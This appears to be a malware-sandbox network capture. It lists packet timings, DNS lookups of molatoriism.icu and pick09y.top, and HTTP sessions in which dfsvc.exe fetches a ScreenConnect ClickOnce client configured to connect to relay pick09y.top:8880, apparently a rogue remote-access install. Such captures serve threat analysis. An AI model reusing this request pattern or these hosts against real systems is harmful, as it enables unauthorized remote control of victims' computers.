                                                                                                                                                                                                Nov 7, 2024 17:56:24.982167006 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:24.982619047 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:24.982662916 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:24.982670069 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:24.982711077 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.069227934 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.069308996 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.104841948 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.104918957 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.104980946 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.105043888 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.105890036 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.105945110 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.148442984 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.148550034 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.148591042 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.148641109 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.192785978 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.192856073 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.228873014 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.228928089 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.229218006 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.229262114 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.229635954 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.229696989 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.352813005 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.352826118 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.352860928 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.353043079 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.353061914 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.353128910 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.353511095 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.353564978 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.475878954 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.475902081 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.476032972 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.476044893 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.476089001 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.518889904 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.518939972 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.519007921 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.519016027 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.519046068 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.519064903 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.599842072 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.599863052 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.599950075 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.599956989 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.599997044 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.700114965 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.700134039 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.700262070 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.700269938 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.700319052 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.764045954 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.764065027 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.764141083 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.764147043 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.764184952 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.846355915 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.846374989 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.846434116 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.846441031 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.846474886 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.887682915 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.887702942 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.887778044 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:25.887784004 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:25.887829065 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.281511068 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.281533957 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.281649113 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.281657934 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.281698942 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286870003 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286887884 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286940098 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286976099 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286986113 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.286997080 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.287018061 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.287053108 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.287060976 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.287094116 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.287136078 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.291165113 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.291182995 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.291270971 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.291276932 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.292411089 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.292429924 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.292479992 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.292486906 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:26.292511940 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.339462042 CET49900443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:26.341995001 CET44349900104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.600328922 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627496958 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627506018 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627538919 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627629995 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627638102 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.627682924 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.646943092 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.646985054 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647022009 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647030115 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.647053003 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.698954105 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.719964027 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.719971895 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.720174074 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747365952 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747375965 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747483969 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747673035 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747680902 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.747726917 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767083883 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767246962 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767254114 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.767322063 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839441061 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839448929 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.839654922 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.866791964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.866801977 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867002964 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867183924 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.867240906 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.886637926 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.886854887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.887059927 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.887109995 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.958867073 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.958935022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986219883 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986294985 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986581087 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:28.986630917 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.006247044 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.006299019 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.049310923 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.049365044 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.078094959 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.078150988 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.105741978 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.105815887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.106117010 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.106168032 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.125463963 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.125662088 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.168616056 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.168790102 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.197418928 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.197530985 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225426912 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225466013 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225511074 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225521088 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.225558996 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.244813919 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.244921923 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288009882 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288108110 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288117886 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.288167953 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.316931963 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.317034960 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.344628096 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.344696045 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.364366055 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.364463091 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.406713009 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.406790972 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.407470942 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.407531977 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.436397076 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.436618090 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483860016 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483867884 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.483891964 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484040022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484040022 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.484047890 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.527090073 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571819067 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571826935 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.571861029 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572160959 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572169065 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.572216034 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646020889 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646050930 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646091938 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646097898 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646120071 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.646131039 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723014116 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723035097 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723090887 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723100901 CET44349925104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723124027 CET49925443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:29.723143101 CET49925443192.168.2.9104.21.96.148
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 7, 2024 17:55:52.501625061 CET | 51328 | 53 | 192.168.2.9 | 1.1.1.1
Nov 7, 2024 17:55:52.561613083 CET | 53 | 51328 | 1.1.1.1 | 192.168.2.9
Nov 7, 2024 17:56:34.118128061 CET | 50267 | 53 | 192.168.2.9 | 1.1.1.1
Nov 7, 2024 17:56:35.021833897 CET | 53 | 50267 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 17:55:52.501625061 CET | 192.168.2.9 | 1.1.1.1 | 0x9df0 | Standard query (0) | molatoriism.icu | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:56:34.118128061 CET | 192.168.2.9 | 1.1.1.1 | 0x9882 | Standard query (0) | pick09y.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 17:55:47.049928904 CET | 1.1.1.1 | 192.168.2.9 | 0xa569 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:55:47.049928904 CET | 1.1.1.1 | 192.168.2.9 | 0xa569 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:55:47.049928904 CET | 1.1.1.1 | 192.168.2.9 | 0xa569 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net |  | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:55:52.561613083 CET | 1.1.1.1 | 192.168.2.9 | 0x9df0 | No error (0) | molatoriism.icu |  | 104.21.96.148 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:55:52.561613083 CET | 1.1.1.1 | 192.168.2.9 | 0x9df0 | No error (0) | molatoriism.icu |  | 172.67.182.214 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:55:58.840266943 CET | 1.1.1.1 | 192.168.2.9 | 0x1e8e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:55:58.840266943 CET | 1.1.1.1 | 192.168.2.9 | 0x1e8e | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:56:01.367996931 CET | 1.1.1.1 | 192.168.2.9 | 0xdf56 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 17:56:01.367996931 CET | 1.1.1.1 | 192.168.2.9 | 0xdf56 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 17:56:35.021833897 CET | 1.1.1.1 | 192.168.2.9 | 0x9882 | No error (0) | pick09y.top |  | 62.182.85.100 | A (IP address) | IN (0x0001) | false
• molatoriism.icu

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49727 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:55:53 UTC | 617 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
Connection: Keep-Alive
2024-11-07 16:55:53 UTC | 806 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:55:53 GMT
Content-Type: application/x-ms-application; charset=utf-8
Content-Length: 147976
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lajaAR9PmmCZmZUouX%2FN0ryZD%2B8gMOG%2FZBrMLaWzQFyTxI8ll6MGqJeQRUTT8JSMym7V26GtlmhV1oytVUHl8i8zAPHg9yA%2FyJZC00fFXxyUC%2BsYhaOGTPnm9RF1OrGKNGU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deeda7f18b26be9-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1208&delivery_rate=2101596&cwnd=251&unsent_bytes=0&cid=76d4e667f93b5feb&ts=714&x=0"
2024-11-07 16:55:53 UTC | 563 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-11-07 16:55:53 UTC | 1369 | IN | Data Ascii: microsoft-com:clickonce.v2"> <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /> <descr
2024-11-07 16:55:53 UTC | 1369 | IN | Data Ascii: twise, LLC&quot;, L=Tampa, S=Florida, C=US" issuerKeyHash="6837e0ebb63bf85f1186fbfe617b088865f44e42" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/
2024-11-07 16:55:53 UTC | 1369 | IN | Data Ascii: nifestInformation><as:SignedBy /><as:AuthenticodePublisher><as:X509SubjectName>CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US</as:X509SubjectName></as:AuthenticodePublisher></r:grant><r:issuer><Signature Id="AuthenticodeSignature" x


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49748 | 104.21.96.148 | 443 | 7480 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:55:57 UTC | 97 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 16:55:58 UTC | 771 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 16:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zptcaOBxKrlPY79Dwawm11JaPxKnfCcwGgM4siitz4qz1mpSunLGPdCAhWmd9AN0RQWMgWlA5lqa%2BZGTlMzOW%2FqjiD%2B4TF1jQn6uCq7RcKd28uhTrHrKgoBx5ziCKnBcQE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deeda9b3d2e2e6c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=712&delivery_rate=2475213&cwnd=233&unsent_bytes=0&cid=d7689845b8bb123a&ts=709&x=0"
